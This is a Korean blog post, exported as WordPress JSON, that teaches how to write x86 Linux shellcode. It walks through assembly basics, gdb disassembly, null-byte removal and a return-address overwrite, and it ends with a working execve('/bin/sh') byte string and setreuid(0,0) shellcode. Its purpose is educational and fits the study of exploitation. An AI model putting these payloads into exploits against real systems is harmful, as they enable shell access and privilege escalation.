{"id":93,"date":"2010-04-17T22:09:26","date_gmt":"2010-04-18T07:09:26","guid":{"rendered":"\/blog\/?p=93"},"modified":"2023-09-21T09:41:17","modified_gmt":"2023-09-21T00:41:17","slug":"shellcode-%ec%9e%91%ec%84%b1-%eb%b0%a9%eb%b2%95","status":"publish","type":"post","link":"https:\/\/hasu0707.duckdns.org\/blog\/?p=93","title":{"rendered":"ShellCode \uc791\uc131 \ubc29\ubc95"},"content":{"rendered":"\n<P>[\ubaa9\ucc28]<br \/>1.\uc5b4\uc148\ube14\ub9ac \uae30\ubcf8 \uba85\ub839\uc5b4<br \/>2.\uae30\ubcf8\uc801\uc778 \uc5b4\uc148\ube14\ub9ac \ucf54\ub4dc\uc758 \uc774\ud574<br \/>3.C\ud504\ub85c\uadf8\ub7a8\uc744 \uc258\ucf54\ub4dc\ub85c \ub9cc\ub4e4\uae30.<br \/>4.setreuid(0,0)\ud568\uc218 \uc258\ucf54\ub4dc\ub85c \ub9cc\ub4e4\uae30<\/P>\n<P>\ubd80\ub85d : unistd.h<\/P>\n<P>1.\uc5b4\uc148\ube14\ub9ac \uae30\ubcf8 \uba85\ub839\uc5b4<br \/>\ub77c\ubca8 | \uc624\ud53c\ucf54\ub4dc |\uc81c1\uc624\ud53c\ub79c\ub4dc |\uc81c2\uc624\ud53c\ub79c\ub4dc | \uc124\uba85\ubb38(\uc8fc\uc11d)<br \/>------+-----------+------------+------------+--------------<br \/>main: movl %esi, %ebp ; comment<\/P>\n<P><br \/>+------+--------------------+---------------------------+--------------------+ <br \/>|\uba85\ub839\uc5b4| \uc774\uc6a9 \ubc29\ubc95 | \uba85\ub839\uc5b4\uc758 \uc758\ubbf8 | C\uc5d0\uc11c\uc758 \uc720\uc0ac \ud45c\ud604 |<br \/>+------+--------------------+---------------------------+--------------------+ <br \/>| mov | movb $0x1,%eax | 1\uc744 eax\uc5d0 \ub123\uc74c.(1 \ubc14\uc774\ud2b8) | eax = 0x01 | <br \/>| | movw $0x1,%eax | 1\uc744 eax\uc5d0 \ub123\uc74c.(2 \ubc14\uc774\ud2b8) | eax = 0x0001 | <br \/>| | movl $0x1,%eax | 1\uc744 eax\uc5d0 \ub123\uc74c.(4 \ubc14\uc774\ud2b8) | eax = 0x00000001 | <br \/>| add | addl $1, %eax | eax\uc5d0 1\uc744 \ub354\ud558\ub77c. | eax = eax + 1 |<br \/>| sub | subl $1, %eax | eax\uc5d0\uc11c 1\uc744 \ube7c\ub77c. | eax = eax - 1 |<br \/>| inc | incl %eax | eax\uc5d0 1\uc744 \uc99d\uac00. | eax++ |<br \/>| dec | decl %eax | eax\uc5d0 1\uc744 \uac10\uc18c. | eax-- |<br \/>| lea | leal 0x8(%esi),%eax| eax\uc5d0 esi+8\uc8fc\uc18c\ub97c \ub123\uc5b4\ub77c.| eax = esi + 8 |<br \/>| xor | xor %eax, %eax | \ub458\uc744 \ube44\uad50\ud574\uc11c \uac19\uc73c\uba74 0 | if(a==b) b=0 |<br \/>| jmp | jmp string | 0x1f\uc704\uce58\ub85c jump\ud558\ub77c. | goto string |<br \/>| call | call star | \uc11c\ube0c\ub8e8\ud2f4\uc744 call \ud568. | star() |<br \/>| ret | ret | \uc11c\ube0c\ub8e8\ud2f4\uc5d0\uc11c \uc6d0\ub798\ub85c \ubcf5\uadc0 | return |<br \/>| int | int $0x80 | system call \uc704\ud55c \uc778\ud130\ub7fd\ud2b8 | - |<br \/>| push | push %ebp | ebp\uac12\uc744 stack\uc5d0 \uc800\uc7a5 | - |<br \/>| pop | pop %esi | stack\uc5d0\uc11c \uaebc\ub0b4 esi\uc5d0 \uc800\uc7a5 | - |<br \/>+------+--------------------+---------------------------+--------------------+<\/P>\n<P>&nbsp;<\/P>\n<P>2.\uae30\ubcf8\uc801\uc778 \uc5b4\uc148\ube14\ub9ac \ucf54\ub4dc\uc758 \uc774\ud574<br \/>ex1)<br \/>-----------------------------------------------asm<br \/>.LC0:<br \/>.string \" a is %d \\n\"<br \/>.globl main<br \/>main:<br \/>pushl %ebp<br \/>movl %esp, %ebp<br \/>subl $4, %esp<br \/>movl $1, -4(%ebp)<br \/>pushl -4(%ebp)<br \/>pushl $.LC0<br \/>call printf<br \/>addl $8, %esp<br \/>leave<br \/>ret<br \/>-----------------------------------------------<\/P>\n<P>ex2)<br \/>-----------------------------------------------C<br \/>main()<br \/>{<br \/>write(1,\"I'm Willy in <a class=\"con_link\" href='mailto:Null@Rootn\",23' target=\"_blank\" rel=\"noopener\">Null@Root\\n\",23<\/A>);<br \/>}<br \/>-----------------------------------------------<\/P>\n<P>(gdb) disassemble main<br \/>Dump of assembler code for function main:<br \/>0x80481dc : push %ebp<br \/>0x80481dd : mov %esp,%ebp<br \/>0x80481df : push $0x17<br \/>0x80481e1 : push $0x808b1c8<br \/>0x80481e6 : push $0x1<br \/>0x80481e8 : call 0x804c390 &lt;__libc_write&gt;<br \/>0x80481ed : add $0xc,%esp<br \/>0x80481f0 : leave <br \/>0x80481f1 : ret <br \/>0x80481f2 : nop <br \/>0x80481f3 : nop <br \/>End of assembler dump.<br \/>(gdb) disassemble __libc_write<br \/>Dump of assembler code for function __libc_write:<br \/>0x804c390 &lt;__libc_write&gt;: push %ebx<br \/>0x804c391 &lt;__libc_write+1&gt;: mov 0x10(%esp,1),%edx<br \/>0x804c395 &lt;__libc_write+5&gt;: mov 0xc(%esp,1),%ecx<br \/>0x804c399 &lt;__libc_write+9&gt;: mov 0x8(%esp,1),%ebx<br \/>0x804c39d &lt;__libc_write+13&gt;: mov $0x4,%eax<br \/>0x804c3a2 &lt;__libc_write+18&gt;: int $0x80<br \/>0x804c3a4 &lt;__libc_write+20&gt;: pop %ebx<br \/>0x804c3a5 &lt;__libc_write+21&gt;: cmp $0xfffff001,%eax<br \/>0x804c3aa &lt;__libc_write+26&gt;: jae 0x804cab0 &lt;__syscall_error&gt;<br \/>0x804c3b0 &lt;__libc_write+32&gt;: ret <br \/>End of assembler dump.<\/P>\n<P>------------------------------------------------asm<br \/>.LC0:<br \/>.string \"I'm Willy in <a class=\"con_link\" href=\"mailto:Null@Rootn\" target=\"_blank\" rel=\"noopener\">Null@Root\\n<\/A>\" <br \/>.globl main<br \/>main:<br \/>movl $0x04, %eax<br \/>movl $0x01, %ebx<br \/>movl $.LC0, %ecx<br \/>movl $0x17, %edx<br \/>int $0x80 <br \/>movl $0x01, %eax<br \/>movl $0x00, %ebx<br \/>int $0x80 <br \/>ret<br \/>------------------------------------------------<br \/>.globl main<br \/>main:<br \/>jmp strings<br \/>start: popl %esi<br \/>movl $0x04, %eax<br \/>movl $0x01, %ebx<br \/>movl %esi, %ecx<br \/>movl $0x17, %edx<br \/>int $0x80<br \/>movl $0x01, %eax<br \/>movl $0x00, %ebx<br \/>int $0x80<br \/>strings:call start<br \/>.string \"I'm Willy in <a class=\"con_link\" href=\"mailto:Null@Rootn\" target=\"_blank\" rel=\"noopener\">Null@Root\\n<\/A>\" <br \/>------------------------------------------------<\/P>\n<P>&nbsp;<\/P>\n<P>3.C\ud504\ub85c\uadf8\ub7a8\uc744 \uc258\ucf54\ub4dc\ub85c \ub9cc\ub4e4\uae30<br \/>-----------------------------<br \/>#include <br \/>main()<br \/>{<br \/>char *name[2];<br \/>name[0] = \"\/bin\/sh\";<br \/>name[1] = NULL;<br \/>execve(name[0],name,NULL);<br \/>}<br \/>-----------------------------<\/P>\n<P><br \/>[willy@Null@Root]$ gcc test51.c -o test51 -mpreferred-stack-boundary=2 -static<\/P>\n<P>[willy@Null@Root]$ gdb -q test51<br \/>(gdb) disassemble main<br \/>Dump of assembler code for function main:<br \/>0x80481dc : push %ebp<br \/>0x80481dd : mov %esp,%ebp<br \/>0x80481df : sub $0x8,%esp<br \/>0x80481e2 : movl $0x808b228,0xfffffff8(%ebp)<br \/>0x80481e9 : movl $0x0,0xfffffffc(%ebp)<br \/>0x80481f0 : push $0x0<br \/>0x80481f2 : lea 0xfffffff8(%ebp),%eax<br \/>0x80481f5 : push %eax<br \/>0x80481f6 : pushl 0xfffffff8(%ebp)<br \/>0x80481f9 : call 0x804c36c &lt;__execve&gt;<br \/>0x80481fe : add $0xc,%esp<br \/>0x8048201 : leave <br \/>0x8048202 : ret <br \/>0x8048203 : nop <br \/>End of assembler dump.<br \/>(gdb) disassemble __execve<br \/>Dump of assembler code for function __execve:<br \/>0x804c36c &lt;__execve&gt;: push %ebp<br \/>0x804c36d &lt;__execve+1&gt;: mov $0x0,%eax<br \/>0x804c372 &lt;__execve+6&gt;: mov %esp,%ebp<br \/>0x804c374 &lt;__execve+8&gt;: test %eax,%eax<br \/>0x804c376 &lt;__execve+10&gt;: push %edi<br \/>0x804c377 &lt;__execve+11&gt;: push %ebx<br \/>0x804c378 &lt;__execve+12&gt;: mov 0x8(%ebp),%edi<br \/>0x804c37b &lt;__execve+15&gt;: je 0x804c382 &lt;__execve+22&gt;<br \/>0x804c37d &lt;__execve+17&gt;: call 0x0<br \/>0x804c382 &lt;__execve+22&gt;: mov 0xc(%ebp),%ecx<br \/>0x804c385 &lt;__execve+25&gt;: mov 0x10(%ebp),%edx<br \/>0x804c388 &lt;__execve+28&gt;: push %ebx<br \/>0x804c389 &lt;__execve+29&gt;: mov %edi,%ebx<br \/>0x804c38b &lt;__execve+31&gt;: mov $0xb,%eax<br \/>0x804c390 &lt;__execve+36&gt;: int $0x80<br \/>0x804c392 &lt;__execve+38&gt;: pop %ebx<br \/>0x804c393 &lt;__execve+39&gt;: mov %eax,%ebx<br \/>0x804c395 &lt;__execve+41&gt;: cmp $0xfffff000,%ebx<br \/>0x804c39b &lt;__execve+47&gt;: jbe 0x804c3ab &lt;__execve+63&gt;<br \/>0x804c39d &lt;__execve+49&gt;: neg %ebx<br \/>0x804c39f &lt;__execve+51&gt;: call 0x80483b4 &lt;__errno_location&gt;<br \/>0x804c3a4 &lt;__execve+56&gt;: mov %ebx,(%eax)<br \/>0x804c3a6 &lt;__execve+58&gt;: mov $0xffffffff,%ebx<br \/>0x804c3ab &lt;__execve+63&gt;: mov %ebx,%eax<br \/>0x804c3ad &lt;__execve+65&gt;: pop %ebx<br \/>0x804c3ae &lt;__execve+66&gt;: pop %edi<br \/>0x804c3af &lt;__execve+67&gt;: pop %ebp<br \/>0x804c3b0 &lt;__execve+68&gt;: ret <br \/>End of assembler dump.<\/P>\n<P>----------------------------------------------------------------------------------------<br \/>.globl main<br \/>main:<br \/>jmp strings<br \/>start: popl %esi &lt;--- \ubb38\uc790\uc5f4 \uc704\uce58 (\ubb38\uc790\uc5f4\uc740 \/bin\/sh 7\uc790)<br \/>movb $0x00,0x7(%esi) &lt;--- \ubb38\uc790\uc5f4 \ub05d\uc5d0 NULL\uc704\uce58 (\ubb38\uc790\uc5f4\uc774 \ub05d\ub0a8\uc744 \uc54c\ub9bc)<br \/>movl %esi, 0x8(%esi) &lt;--- name[0]\uc744 \uad6c\ud604\ud558\uae30 \uc704\ud574 \ubb38\uc790\uc5f4 \ub4a4\uc5d0 \ub123\uc74c.<br \/>movl $0x00,0xc(%esi) &lt;--- name[1]\uc744 \uad6c\ud604\ud558\uae30 \uc704\ud574\uc11c name[0]\ub4a4\uc5d0 NULL\uc744 \ub123\uc74c.<br \/>movl $0x0b,%eax &lt;--- %eax\uc5d0 0xb(11)\uc744 \ub123\uc5b4 execve() system call\ud568. <br \/>movl %esi, %ebx &lt;--- %ebx\uc5d0 \ubb38\uc790\uc5f4\uc744 \ub123\uc74c.<br \/>leal 0x8(%esi), %ecx &lt;--- %ecx\uc5d0 name = name[0]+name[1]\uc744 \ub123\uc74c.<br \/>movl 0xc(%esi), %edx &lt;--- %edx\uc5d0 NULL(0x00)\uc744 \ub123\ub294\ub2e4.<br \/>int $0x80 &lt;--- interrupt 0x80\uc744 \ud574\uc11c system call\uc744 \ud568.<br \/>movl $0x01,%eax<br \/>movl $0x00,%ebx<br \/>int $0x80 &lt;--- exit(0) system call. <br \/>strings: call start<br \/>.string \"\/bin\/sh\"<br \/>----------------------------------------------------------------------------------------<\/P>\n<P>[willy@Null@Root]$ objdump -d test51<\/P>\n<P>:<br \/>0804841c :<br \/>804841c: eb 2a jmp 8048448 <\/P>\n<P>0804841e :<br \/>804841e: 5e pop %esi<br \/>804841f: c6 46 07 00 movb $0x0,0x7(%esi)<br \/>8048422: 89 76 08 mov %esi,0x8(%esi)<br \/>8048426: c7 46 0c 00 00 00 00 movl $0x0,0xc(%esi)<br \/>804842d: b8 0b 00 00 00 mov $0xb,%eax<br \/>8048432: 89 f3 mov %esi,%ebx<br \/>8048434: 8d 4e 08 lea 0x8(%esi),%ecx<br \/>8048437: 8b 56 0c mov 0xc(%esi),%edx<br \/>804843a: cd 80 int $0x80<br \/>804843c: b8 01 00 00 00 mov $0x1,%eax<br \/>8048441: bb 00 00 00 00 mov $0x0,%ebx<br \/>8048446: cd 80 int $0x80<\/P>\n<P>08048448 :<br \/>8048448: e8 d1 ff ff ff call 804841e <br \/>804844d: 2f das <br \/>804844e: 62 69 6e bound %ebp,0x6e(%ecx)<br \/>8048451: 2f das <br \/>8048452: 73 68 jae 80484bc <\/P>\n<P><br \/>----------------------------------------------------------------------------------------<br \/>\uc218\uc815\uc804 | \uc218\uc815\ud6c4 <br \/>----------------------------+------------------------------<br \/>movb $0x00,0x7(%esi) | xor %eax, %eax<br \/>| movb %al, 0x7(%esi)<br \/>movl $0x00,0xc(%esi) | movl %eax, 0xc(%esi)<br \/>movl 0xc(%esi), %edx | xor %edx, %edx<\/P>\n<P>[willy@Null@Root]$ cat test52.s<br \/>.globl main<br \/>main:<br \/>jmp strings<br \/>start: popl %esi<br \/>movl %esi, 0x8(%esi)<br \/>xor %eax, %eax<br \/>movb %al, 0x7(%esi)<br \/>movl %eax, 0xc(%esi)<br \/>movb $0x0b, %al<br \/>movl %esi, %ebx<br \/>leal 0x8(%esi), %ecx<br \/>xor %edx, %edx<br \/>int $0x80<br \/>movb $0x01,%al<br \/>xor %ebx, %ebx<br \/>int $0x80<br \/>strings:call start<br \/>.string \"\/bin\/sh\"<br \/>----------------------------------------------------------------------------------------<\/P>\n<P>char sc1[] =<br \/>\"\\xeb\\x1d\\x5e\\x89\\x76\\x08\\x31\\xc0\\x88\\x46\\x07\\x89\\x46\\x0c\\xb0\\x0b\\x89\\xf3\\x8d\"<br \/>\"\\x4e\\x08\\x31\\xd2\\xcd\\x80\\xb0\\x01\\x31\\xdb\\xcd\\x80\\xe8\\xde\\xff\\xff\\xff\/bin\/sh\";<\/P>\n<P>main()<br \/>{<br \/>int *ret;<\/P>\n<P>ret = (int *)&amp;ret + 2;<br \/>(*ret) = (int)sc1;<br \/>}<\/P>\n<P>[willy@Null@Root]$ gcc test44.c -o test44<\/P>\n<P>[willy@Null@Root]$ .\/test44<br \/>sh-2.04$ ps<br \/>PID TTY TIME CMD<br \/>9238 pts\/6 00:00:00 bash<br \/>9262 pts\/6 00:00:00 sh<br \/>9264 pts\/6 00:00:00 ps<\/P>\n<P><br \/>4.setreuid(0,0)\ud568\uc218 \uc258\ucf54\ub4dc\ub85c \ub9cc\ub4e4\uae30<br \/>-------------------------------------------------------------------------------------<\/P>\n<P>main()<br \/>{<br \/>setreuid(0,0);<br \/>}<\/P>\n<P>-------------------------------------------------------------------------------------<br \/>.globl main<\/P>\n<P>main:<br \/>movl $0x0, %ecx<br \/>movl $0x0, %ebx<br \/>movl $0x46, %eax<br \/>int $0x80<\/P>\n<P>-------------------------------------------------------------------------------------<\/P>\n<P>080483d0 :<br \/>80483d0: b9 14 0c 00 00 mov $0xc14,%ecx<br \/>80483d5: bb 14 0c 00 00 mov $0xc14,%ebx<br \/>80483da: b8 46 00 00 00 mov $0x46,%eax<br \/>80483df: cd 80 int $0x80<\/P>\n<P>-------------------------------------------------------------------------------------<\/P>\n<P>.globl main<\/P>\n<P>main:<br \/>xor %ecx, %ecx<br \/>movw $0xc14, %cx<br \/>xor %ebx, %ebx<br \/>movw $0xc14, %bx<br \/>xor %eax, %eax<br \/>movb $0x46, %al<br \/>int $0x80<\/P>\n<P>-------------------------------------------------------------------------------------<\/P>\n<P>080483d0 :<br \/>80483d0: 31 c9 xor %ecx,%ecx<br \/>80483d2: 66 b9 14 0c mov $0xc14,%cx<br \/>80483d6: 31 db xor %ebx,%ebx<br \/>80483d8: 66 bb 14 0c mov $0xc14,%bx<br \/>80483dc: 31 c0 xor %eax,%eax<br \/>80483de: b0 46 mov $0x46,%al<br \/>80483e0: cd 80 int $0x80<br \/>80483e2: 89 f6 mov %esi,%esi<\/P>\n<P>-------------------------------------------------------------------------------------<\/P>\n<P>\"\\x31\\xc9\" \/* xor %ecx,%ecx *\/<br \/>\"\\x66\\xb9\\x14\\x0c\" \/* mov $0xc14,%cx *\/<br \/>\"\\x31\\xdb\" \/* xor %ebx,%ebx *\/<br \/>\"\\x66\\xbb\\x14\\x0c\" \/* mov $0xc14,%bx *\/<br \/>\"\\x31\\xc0\" \/* xor %eax,%eax *\/<br \/>\"\\xb0\\x46\" \/* mov $0x46,%al *\/<br \/>\"\\xcd\\x80\" \/* int $0x80 *\/<\/P>\n<P>------------------------------------------------------------------------------------- <\/P>\n<P>\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141\u3141<\/P>\n<DIV id=contents>\n<P>------------------------------------------------------------------------------------------ <br \/>Shellcode\ub97c \ub9cc\ub4e4\uae30 \uc704\ud574\uc11c\ub294 \uae30\ubcf8\uc801\uc73c\ub85c \uba54\ubaa8\ub9ac \uad6c\uc870\uc640 \uac04\ub2e8\ud55c \uc5b4\uc148\ube14\ub9ac\uc5b4\uc5d0 \ub300\ud55c \uc774\ud574\ub97c \ud544\uc694 <br \/>\ub85c\ud55c\ub2e4.&nbsp; \ucd5c\uadfc Shellcode\uc5d0 \uad00\ud55c \ub9ce\uc740 \ubb38\uc11c\ub4e4\uc774 \uc18c\uac1c\ub418\uace0 \uc788\uc73c\ub098 \uba54\ubaa8\ub9ac\ub098 \uc5b4\uc148\ube14\ub9ac\uc5d0 \ub300\ud558\uc5ec <br \/>\uc5b4\ub290 \uc815\ub3c4 \uc54c\uace0 \uc788\ub294 \uc0ac\ub78c\uc744 \ub300\uc0c1\uc73c\ub85c \uc18c\uac1c\ub418\uace0 \uc788\uc5b4 \uae30\uacc4\uc5b4 Code\ub97c \ucc98\uc74c \uc811\ud558\ub294 \uc0ac\ub78c\ub4e4\uc5d0\uac8c\ub294&nbsp; <br \/>\uc804\uccb4 \ud750\ub984\uc744 \ud30c\uc545\ud558\ub294\ub370 \uc5b4\ub824\uc6c0\uc774 \uc788\ub2e4. <br \/>\uc774 \ubb38\uc11c\uc5d0\uc11c\ub294 \uac00\uc7a5 \uae30\ubcf8\uc774 \ub418\ub294 \uba54\ubaa8\ub9ac\uc758 \uad6c\uc870 \/ \ub808\uc9c0\uc2a4\ud130 \/ \uc5b4\uc148\ube14\ub9ac\uc758 \uae30\ubcf8\uc801\uc778 \uba85\ub839\uc5b4\ubd80\ud130 <br \/>\uc2dc\uc791\ud558\uc5ec Shellcode \uc81c\uc791\uacfc \uc218\uc815\ubfd0\ub9cc\uc544\ub2c8\ub77c, \uc784\uc758 \uae30\ub2a5\uc758 system call\uc744 \uc218\ud589\ud558\uae30 \uc704\ud55c \uae30\uacc4\uc5b4 <br \/>code\ub97c \ub9cc\ub4dc\ub294 \uac83\uc744 \uc124\uba85\ud558\uc600\ub2e4. &nbsp; <br \/>\ucc38\uace0\ub85c \uc774\ubb38\uc11c\uc5d0 \uc18c\uac1c\ub41c \ubaa8\ub4e0 \ub0b4\uc6a9\uc740 Linux Red Hat 7.0 i686\uc744 \uae30\ubcf8\uc73c\ub85c \ub9cc\ub4e4\uc5b4 \uc84c\uc73c\ubbc0\ub85c CPU <br \/>,OS\uc5d0 \ub530\ub77c\uc11c \ub2e4\uc18c \ucc28\uc774\uac00 \uc788\uc744\uc218 \uc788\ub2e4.&nbsp; <br \/>\uae30\ud0c0 \uc774 \ubb38\uc11c\uc5d0 \ub300\ud55c \uc9c8\ubb38 \/ \uc9c0\uc801\uc0ac\ud56d\uc774 \uc788\ub294 \uc0ac\ub78c\uc740 Willy (jeazon@hanmail.net)\uc5d0\uac8c \uc5f0\ub77d\ubc14\ub78c. <br \/>------------------------------------------------------------------------------------------ <br \/><br \/>&lt;Test System \uc815\ubcf4&gt; <br \/>CPU: GenuineIntel Pentium II 266MHz <br \/>OS : Linux Redhat 7.0 i686 <br \/>GCC: (GNU) 2.96 20000731&nbsp; <br \/>GDB: GNU gdb 5.0 <br \/><br \/>&lt;\uc2a4\ud14d\uacfc \ub808\uc9c0\uc2a4\ud130&gt; <br \/>\uc2a4\ud14d(stack)\uc740 \uba54\ubaa8\ub9ac\uc758 \uc601\uc5ed\uc774\uba70, \uc601\uc5b4\uc758 \ub73b\uc744 \ubcf4\uba74 \"\uc313\uc544\uc62c\ub9b0 \uac83\" \uc800\uc7a5\uacf5\uac04\uc774 \uc313\uc544 \uc62c\ub9ac\ub294 \ud615\ud0dc\ub85c <br \/>\ub418\uc5b4\uc788\ub2e4\ub294 \uc758\ubbf8\uc774\ub2e4. \uc6b0\ub9ac\uac00 \ud504\ub85c\uadf8\ub7a8\uc744 \uc218\ud589\ud558\uba74\uc11c \uc0dd\uc131\ub41c data\ub098 \uc785\ub825\uc744 \ud1b5\ud558\uc5ec \ub9cc\ub4e4\uc5b4\uc9c4 data\ub294&nbsp; <br \/>\uc77c\ub2e8 \uc774 \uc2a4\ud14d\uc5d0 \uc313\uc600\ub2e4\uac00 \ud544\uc694\uc2dc CPU\ub85c \ubcf4\ub0b4\uc838 \uacc4\uc0b0\ub41c\uace0 \uadf8 \uacb0\uacfc\ubb3c\uc774 \ub2e4\uc2dc \uc2a4\ud14d\uc5d0 \uc313\uc774\uac8c \ub41c\ub2e4.&nbsp; <br \/>\uc2a4\ud14d\uc5d0 \uc313\uc5ec \uc788\ub294 data\ub294 \uc8fc\uc18c(address)\ub97c \uc774\uc6a9\ud558\uc5ec \uc81c\uc5b4\ub41c\ub2e4. \uc2a4\ud14d\uc740 2\uac00\uc9c0 \ud2b9\uc9d5\uc774 \uc788\ub294\ub370 \ud558\ub098\ub294 <br \/>data\ub97c push(\ucd94\uac00)\ud558\uba74 \ub0ae\uc740 \uc8fc\uc18c \ucabd\uc73c\ub85c \uc313\uc778\ub2e4 \uac83\uacfc, \ub098\uc911\uc5d0 \ub4e4\uc5b4\uac04 data\uac00 \uba3c\uc800 \ub098\uc624\ub294 lifo(last <br \/>in first out)\uac1c\ub150\uc73c\ub85c \ud56d\uc544\ub9ac\uc5d0 \ubb3c\uac74\uc744 \ub123\uc5c8\ub2e4\uac00 \uaebc\ub0bc\ub54c \ub9e8 \ub4a4\uc5d0 \ub123\uc740 \uac83\uc774 \ub9e8 \uba3c\uc800 \ub098\uc624\ub294 \uac83\uacfc&nbsp; <br \/>\uac19\ub2e4. \uc774\uac83\uc744 \ub3c4\uc2dd\ud654 \ud558\uba74 \uc544\ub798\uc640 \uac19\ub2e4.. <br \/>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <br \/>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; data in\/out <br \/><br \/>&nbsp; &nbsp; &nbsp; &nbsp;&nbsp; | &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; | &nbsp; &nbsp; 0xfffffffb &nbsp;&nbsp; \ud558\uc704 \uc8fc\uc18c <br \/>&nbsp; &nbsp; &nbsp; &nbsp;&nbsp; +----------+ <br \/>&nbsp; &nbsp; &nbsp; &nbsp;&nbsp; | &nbsp;&nbsp; data 4 &nbsp; | &nbsp; &nbsp; 0xfffffffc <br \/>&nbsp; &nbsp; &nbsp; &nbsp;&nbsp; +----------+ <br \/>&nbsp; &nbsp; &nbsp; &nbsp;&nbsp; | &nbsp;&nbsp; data 3&nbsp; &nbsp;| &nbsp; &nbsp; 0xfffffffd &nbsp; &nbsp; &nbsp; <br \/>&nbsp; &nbsp; &nbsp; &nbsp;&nbsp; +----------+ <br \/>&nbsp; &nbsp; &nbsp; &nbsp;&nbsp; | &nbsp;&nbsp; data 2&nbsp; &nbsp;| &nbsp; &nbsp; 0xfffffffe <br \/>&nbsp; &nbsp; &nbsp; &nbsp;&nbsp; +----------+ <br \/>&nbsp; &nbsp; &nbsp; &nbsp;&nbsp; | &nbsp;&nbsp; data 1&nbsp; &nbsp;| &nbsp; &nbsp; 0xffffffff &nbsp; &nbsp; \uc0c1\uc704 \uc8fc\uc18c <br \/>&nbsp; &nbsp; &nbsp; &nbsp;&nbsp; +----------+ <br \/><br \/>\ub808\uc9c0\uc2a4\ud130(register)\ub294 CPU\uc758 \uc601\uc5ed\uc73c\ub85c \uace0\uc18d\uc5f0\uc0b0\uc744 \ud558\uae30\uc704\ud574 \uc0ac\uc6a9\ub418\ub294 unit\uc774\ub2e4. \ub808\uc9c0\uc2a4\ud130\uc5d0\ub294 ax,bx, <br \/>cx,dx,si,di,bp,sp\uc2dd\uc73c\ub85c \uc774\ub984\uc774 \ubd99\uc5b4 \uc788\ub294\ub370, \uc774\uac83\uc740 \uc0ac\ub78c\uc5d0\uac8c \uc774\ub984\uc744 \ubd99\uc5ec \uac01 \uac1c\uc778\uc758 \uace0\uc720 id\ub97c&nbsp; <br \/>\ubd80\uc5ec\ud558\ub294 \uac83\uacfc \uac19\ub2e4. \uc989 \uba85\ub839\uc744 \uc218\ud589\ud560\ub54c \uc704\uce58\ub97c \ucc3e\uae30 \uc704\ud574 \uc0ac\uc6a9\ub41c\ub2e4\uace0 \ubcf4\uba74\ub41c\ub2e4. \ub808\uc9c0\uc2a4\ud130\uc758 \uc885\ub958\ub294&nbsp; <br \/>\uc77c\ubc18\ubaa9\uc801 \ub808\uc9c0\uc2a4\ud130(general-purpose register), \uc0c1\ud0dc \ub808\uc9c0\uc2a4\ud130(status register)\uc640 \uc138\uadf8\uba3c\ud2b8 \ub808\uc9c0 <br \/>\uc2a4\ud130(segment register)\ub4f1\uc774 \uc788\ub294\ub2e4. \uadf8\uc911\uc5d0\uc11c \uc77c\ubc18\uc801\uc73c\ub85c \uac00\uc7a5 \ub9ce\uc774 \uc4f0\uc774\uba70 \uae30\ubcf8\uc774 \ub418\ub294 \uc77c\ubc18\ubaa9\uc801\uc758 <br \/>\ub808\uc9c0\uc2a4\ud130(general-purpose register)\ub9cc \uc774\ud574\ud574\ub3c4 shellcode\ub97c \ub9cc\ub4dc\ub294\ub370 \ud070 \ubb34\ub9ac\uac00 \uc5c6\uc744 \uac83\uc73c\ub85c \uc0dd\uac01 <br \/>\ub41c\ub2e4. <\/P>\n<P>\uc77c\ubc18\ubaa9\uc801\uc758 \ub808\uc9c0\uc2a4\ud130\uc758 8\uac1c(<FONT color=#d41a01>ax,bx,cx,dx,si,di,bp,sp<\/FONT>) \uc815\ub3c4\uac00 \uc788\uc73c\uba70, <\/P>\n<P>\uadf8\uc911\uc5d0 <U><STRONG><FONT color=#0000ff>ax,bx,cx,dx\ub294 \uacc4\uc0b0\uc744 \uc704\ud574 \uc9c1\uc811\uc801\uc73c\ub85c data<\/FONT><\/STRONG><\/U>\ub97c \uc8fc\uace0 \ubc1b\ub294 \ub808\uc9c0\uc2a4\ud130\uc774\uba70, <\/P>\n<P><FONT color=#008000><STRONG><U>si,di,bp,sp\ub294 \uc8fc\uc18c\ub97c \uc8fc\uace0 \ubc1b\ub294 \ub808\uc9c0\uc2a4\ud130 <\/U><\/STRONG><\/FONT>\uc774\ub2e4. <\/P>\n<P>32\ube44\ud2b8 CPU\uc5d0\uc11c\ub294 \uc8fc\uc18c\uac00 4\ubc14\uc774\ud2b8(32\ube44\ud2b8)\uc774\ubbc0\ub85c \"e\"\ub97c \ubd99\uc5ec\uc11c 4\ubc14\uc774\ud2b8\ub85c \ud655\uc7a5\ud558\uc5ec <\/P>\n<P>\uc77c\ubc18\uc801\uc73c\ub85c&nbsp; \uc0ac\uc6a9\ud55c\ub2e4. <\/P>\n<P>\uc989 \uc774\uc81c si,di,bp,sp\uc758 \ud655\uc7a5 \uac1c\ub150\uc778 esi,edi,ebp,esp\ub9cc \uae30\uc5b5\ud558\uba74 \ub41c\ub2e4.&nbsp; <\/P>\n<P><br \/><br \/>&nbsp; &nbsp; &nbsp;&nbsp; gerneral &nbsp;&nbsp; | &nbsp; status &nbsp; &nbsp; &nbsp;|&nbsp; segment <br \/>&nbsp; &nbsp; &nbsp;&nbsp; ----------+------------+---------- <br \/>&nbsp; &nbsp; &nbsp;&nbsp; eax(ax) &nbsp; &nbsp; &nbsp; &nbsp; eflags &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; cs <br \/>&nbsp; &nbsp; &nbsp;&nbsp; ebx(bx) &nbsp; &nbsp; &nbsp; &nbsp; eip &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ds <br \/>&nbsp; &nbsp; &nbsp;&nbsp; ecx(cx) &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;ss&nbsp; <br \/>&nbsp; &nbsp; &nbsp;&nbsp; edx(dx) &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; es <br \/>&nbsp; &nbsp; &nbsp;&nbsp; esi &nbsp; 